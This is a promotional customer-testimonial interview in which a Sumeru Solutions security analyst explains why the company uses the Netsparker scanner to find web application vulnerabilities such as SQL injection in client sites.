    "We like Netsparker not only because it is able to be configured quickly, but also the scans themselves are completed quickly, reliably and without false positives (a large timesaver in and of itself)."

Scanning web applications at scale is arguably one of the more daunting challenges for any web security professional. This interview with Sumeru's Lead Penetration Tester explains why he selected Netsparker over other solutions to manage, automate and accelerate the security scanning of their clients' websites.

    Can you tell us a little about Sumeru Solutions and your role within the company?

    Sure, I’m an Information Security Analyst with Sumeru. We’ve been in the Information Technology Services business for a little over a decade. We actually started out quite small – just 3-4 individuals making great software.

    We now have clients worldwide – 22 countries to be exact – who rely on us for their web application services, information security and business process management needs.

    Our clients include entrepreneurs, banks, hotels, airlines, political parties and more. We’re very passionate about what we do and have a strong sense of purpose.

We presently have three offices: one in the US, one in the UK and one in India. We also have a joint venture office in Africa.

As far as certifications go, we are a Microsoft Gold Certified Partner and CERT-In certified, as well as an ISO 27001 Certified Company.

    Can you share some information about your decision to use Netsparker?

    We started using Netsparker in 2013 with the intention of automating and speeding up our web scanning process to find vulnerabilities. We have since made automated vulnerability scanning a part of our regular pen testing process.

    Prior to using Netsparker, we were performing manual testing for critical flaws and implementing web firewalls. However, because we manage a tremendous amount of critical customer data and sensitive information, finding a way to make our scanning process as consistent and reliable as possible was a top priority.

    We did take some time to test other web application security scanners and found that set-up time and reliability were not really comparable to Netsparker.

    What can you tell us about your current use of Netsparker?

    Obviously, after 10 years in business, we have developed some very consistent practices and procedures.

    We currently use Netsparker five days per week and scan four different web applications on a revolving basis. These consist of both civilian and government applications built on a variety of web frameworks and running on different types of servers. Netsparker handles this variety with ease.

    Did Netsparker discover any vulnerabilities that you’re comfortable disclosing?

    Yes! In several critical applications, Netsparker was able to identify both SQL injection and code execution vulnerabilities, two vulnerability types it’s very good at discovering.

    Have you had an opportunity or need to call our customer service or sales teams? How was that experience?

    Yes we have and we’ve always found the customer service to be entirely satisfactory – exactly what we would expect from such a mission-critical part of our business.

    If you had to summarize Netsparker in just a single sentence, what would you say?

    Netsparker is our tool of choice for scanning large web applications and it’s great at finding SQL Injection vulnerabilities.
